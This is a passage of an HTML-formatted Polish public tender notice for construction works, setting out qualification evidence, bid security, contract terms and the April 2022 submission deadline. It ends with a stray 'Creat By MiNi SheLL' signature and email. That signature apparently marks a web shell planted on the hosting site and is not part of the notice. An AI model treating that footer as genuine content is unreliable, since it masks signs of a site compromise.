zł brutto każda, robotom budowlanym stanowiącym przedmiot zamówienia,<br/>b)	dysponuje osobami zdolnymi do wykonania zamówienia, a w szczególności na czas realizacji przedmiotu zamówienia będzie dysponował osobą przewidzianą do sprawowania funkcji:<br/>	Kierownika Budowy z uprawnieniami budowlanymi do kierowania robotami w specjalności instalacyjnej, w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, <br/>	Kierownika Robót z uprawnieniami budowlanymi do kierowania robotami w specjalności drogowej,<br/>	Kierownika Robót z uprawnieniami budowlanymi do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, <br/>zgodnie z rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (t. j. Dz. U. z 2014 poz. 1278) lub odpowiadające im ważne uprawnienia budowlane (w tym wydane na podstawie wcześniej obowiązujących przepisów) zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2020 r., poz. 1333 z późn. zm.) lub odpowiadające im ważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów lub odpowiadające im uprawnienia budowlane, które zostały wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2020 r., poz. 220), art. 20a ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (Dz. U. z 2019 r. poz. 1117). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Brak podstaw wykluczenia:<br/>1) Oświadczenie wykonawcy, w zakresie art. 108 ust.1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty<br/>częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej – Załącznik nr 4 do SWZ;<br/>2) Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 p.z.p. w zakresie odnoszącym się do podstaw wykluczenia wskazanych w art. 108 ust. 1 pkt 1-4 i 6 p.z.p. - Załącznik nr 5 do SWZ;<br/>3) Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Spełnianie warunków udziału w postępowaniu:<br/>1) Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - Załącznik nr 7 do SWZ;<br/>2) Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli<br/>okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i<br/>prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – inne dokumenty - Załącznik nr 6 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oświadczenia składane obligatoryjnie wraz z ofertą:<br/>1) W celu potwierdzenia braku podstaw do wykluczenia Wykonawcy z postępowania o udzielenie zamówienia publicznego w okolicznościach, o których mowa w art.108 ust.1oraz art. 109 ust. 1 pkt 4 ustawy p.z.p., Wykonawca musi dołączyć do oferty oświadczenie wykonawcy o braku podstaw do wykluczenia według wzoru stanowiącego Załącznik nr 2 do SWZ,<br/>2) W celu potwierdzenia spełnienia warunków udziału w postępowaniu, Wykonawca musi dołączyć do oferty oświadczenie Wykonawcy o spełnieniu warunków zgodnie z wymogami Zamawiającego określonymi w § 5 SWZ, według wzoru stanowiącego Załącznik nr 3 do SWZ,<br/>3) Wykonawca powołujący się na zasoby innych podmiotów, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania warunków udziału w postępowaniu przedstawia wraz ze swoim oświadczeniem, o którym mowa w punkcie 1) i 2) także Oświadczenie podmiotu udostępniającego zasoby – podpisane odrębnie przez podmiot udostępniający zasoby – Załącznik nr 2 do SWZ i Załącznik nr 3 do SWZ,<br/>4) W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie w celu potwierdzenia braku podstaw do wykluczenia i spełnianiu warunków udziału w postępowaniu, o których mowa w punkcie 1) i 2) składa każdy z wykonawców wspólnie ubiegających się o zamówienie.– Załącznik nr 2 do SWZ i Załącznik nr 3 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Oferta musi być zabezpieczona wadium w wysokości: 20 000,00 zł (słownie: dwadzieścia tysięcy złotych 00/100).<br/>2.	Wadium należy wnieść w terminie do dnia 2022-04-11 do godz. 10:00.<br/>3.	Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1)	pieniądzu: przelewem na rachunek bankowy Zamawiającego: Bank Spółdzielczy z siedzibą w Tarnobrzegu 09 9434 1070 2005 1500 0117 0039,<br/>2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,<br/>3)	gwarancjach bankowych,<br/>4)	gwarancjach ubezpieczeniowych,<br/>5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2014 r. poz. 1804 oraz z 2015 r. poz. 978 i 1240).<br/>4.	Wadium wnoszone w formie poręczeń, gwarancji należy złożyć w oryginale. Zamawiający wymaga złożenia tego dokumentu środkiem komunikacji elektronicznej podpisanego kwalifikowanym podpisem elektronicznym.<br/>5.	Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>6.	Wykonawca zobowiązany jest wnieść wadium na okres związania ofertą.<br/>7.	Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 98 ust. 6 ustawy p.z.p.<br/>8.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.<br/>9.	Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.<br/>10.	Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie art. 98 ust. 1 ustawy p.z.p., jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.<br/>11.	Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.<br/>12.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art.107 ust. 2 lub art. 128 ust. 1 ustawy p.z.p., z przyczyn leżących po jego stronie, nie złożył podmiotowych środków dowodowych lub przedmiotowych środków dowodowych potwierdzających okoliczności, o których mowa w art. 57 lub art. 106 ust. 1 ustawy p.z.p., oświadczenia, o którym mowa w art. 125 ust. 1 ustawy p.z.p., innych dokumentów lub oświadczeń lub nie wyraził zgody na poprawienie omyłki, o której mowa wart. 223 ust. 2 pkt 3, co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.<br/>13.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:<br/>1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,<br/>2)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,<br/>3)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w § 6 ust.1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, o którym mowa w art. 117 ust.4 ustawy p.z.p. z którego wynika, jaki zakres przedmiotu zamówienia wykonują poszczególni Wykonawcy - Załącznik nr 8 do SWZ.<br/>4) Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość wprowadzenia zmian do zawartej umowy w przypadkach i na warunkach określonych w §14 w projekcie umowy . Projekt umowy stanowi Część 2. Wzór umowy do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-11 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP i udostępnionego również na miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-11 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com